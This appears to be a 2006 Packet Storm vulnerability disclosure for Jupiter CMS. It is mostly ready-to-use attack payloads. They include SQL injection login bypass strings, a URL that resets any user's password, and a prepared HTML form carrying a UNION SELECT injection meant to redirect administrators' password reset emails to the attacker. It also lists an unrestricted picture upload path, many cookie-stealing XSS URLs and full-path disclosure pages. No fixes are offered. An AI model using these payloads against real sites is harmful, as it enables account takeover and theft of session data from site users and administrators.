jupiterCMS-sql.txt

2006-09-16T00:00:00
ID PACKETSTORM:50101
Type packetstorm
Reporter HACKERS PAL
Modified 2006-09-16T00:00:00

Description

                                        
                                            `Hello,,  
  
  
Jupiter CMS Sql injections ,full path and xss vulnerabilities  
  
  
Discovered By : HACKERS PAL  
Copy rights : HACKERS PAL  
Website : http://www.soqor.net  
Email Address : security@soqor.net  
  
  
if magic_quotes_gpc = off  
login with  
user name :   
' or id=1/*  
or  
' or authorization = 4/*  
  
you will be loged in with full permission  
-------------------------  
index.php?n=modules/register&a=3&d=3&key='%20or%20id=1/*  
You will be able to change the password for any user .. know his id and put it in the url.  
  
--  
or you can use this form by changing http://localhost/jupiter/ to the website dir to recive reset password email to all the administrators  
  
<form method="post" action="http://localhost/jupiter/index.php?n=modules/register">  
<table class="main" cellspacing="1" cellpadding="4" width="100%">  
<tr class="head">   
<td colspan="2" class="head">Forgot your password?</td>  
</tr>  
<tr>  
<td class="con1" width="42%" valign="middle"><span class="hilight">Username:</span></td>  
<td class="con1" width="58%" valign="bottom"><input type="text" name="fpwusername" style="width:100%" class="box" tabindex="5" value="' union select id,authorization ,username ,password ,'security@soqor.net',url,age,flag,location,registered,lastvisit,forum_lastvisit,ip,forumposts,signature,aboutme,msn,yahoo,icq,aim,skype,avatar,hideemail,templates,calendarbday,status,multikey,actime from users where id=1or authorization=4/*"></td>  
</tr>  
<tr>  
<td class="con1"><input type="button" style="width:100" class="box" value="Back" onClick="window.history.go(-1);" tabindex="8"></td>  
<td class="con1" align="right"><input type="submit" style="width:100" class="box" value="Submit" tabindex="7"></td>  
</tr>  
<input type="hidden" name="a" value="3">  
<input type="hidden" name="d" value="1">  
</table>  
</form>  
  
put the user name value  
Change security@soqor.net to your email  
' union select id,authorization ,username ,password ,'security@soqor.net',url,age,flag,location,registered,lastvisit,forum_lastvisit,ip,forumposts,signature,aboutme,msn,yahoo,icq,aim,skype,avatar,hideemail,templates,calendarbday,status,multikey,actime from users where id=1or authorization=4/*  
/********************************************/  
  
Upload any picture to their gallery  
  
modules/galleryuploadfunction.php  
  
picture path will be   
gallery/albums/public/name.ext  
/********************************************/  
  
xss (Cross site scripting)  
  
modules/blocks.php?is_webmaster=2&language[Admin%20name]=<script>alert(document.cookie);</script>  
modules/blocks.php?is_webmaster=2&language[Admin%20back]=<script>alert(document.cookie);</script>  
  
modules/register.php?is_guest=1&language[Register%20title]=<script>alert(document.cookie);</script>  
modules/register.php?is_guest=1&language[Register%20title2]=<script>alert(document.cookie);</script>  
  
modules/mass-email.php?language[Mass-Email%20form%20title]=<script>alert(document.cookie);</script>  
modules/mass-email.php?language[Mass-Email%20form%20desc]=<script>alert(document.cookie);</script>  
modules/mass-email.php?language[Mass-Email%20form%20desc2]=<script>alert(document.cookie);</script>  
change the value for language[Mass-Email%20form%20desc(2-4)]  
  
modules/register.php?is_guest=1&a=3&language[Forgotten%20title]=<script>alert(document.cookie);</script>  
modules/register.php?is_guest=1&a=3&language[Forgotten%20desc]=<script>alert(document.cookie);</script>  
modules/register.php?is_guest=1&a=3&language[Forgotten%20desc2]=<script>alert(document.cookie);</script>  
change the var value for language[Forgotten%20desc(2 - 5)]  
  
  
modules/search.php?language[Search%20view%20desc]=<script>alert(document.cookie);</script>  
modules/search.php?language[Search%20view%20desc2]=<script>alert(document.cookie);</script>  
Change the value for language[Search%20view%20desc(2-8)]  
  
/********************************************/  
  
Full path  
includes/functions.php  
  
modules/register.php?is_guest=1  
modules/online.php  
modules/poll.php  
modules/panel.php  
modules/pm.php  
modules/news.php  
modules/templates_change.php  
modules/users.php  
modules/misc.php?a=1&is_webmaster=1  
modules/masspm.php  
modules/mass-email.php?subject_choice=1&message_choice=1&a=1  
modules/main-nav.php  
modules/login.php  
modules/layout.php?is_webmaster=2  
modules/hq.php  
modules/forum.php  
modules/forum-admin.php?n=modules/forum-admin&a=1  
modules/events.php  
modules/emoticons.php  
modules/download.php  
modules/blocks.php?is_webmaster=2  
modules/ban.php  
modules/badwords.php  
modules/ads.php  
modules/admin.php  
  
/********************************************/  
  
WwW.SoQoR.NeT  
`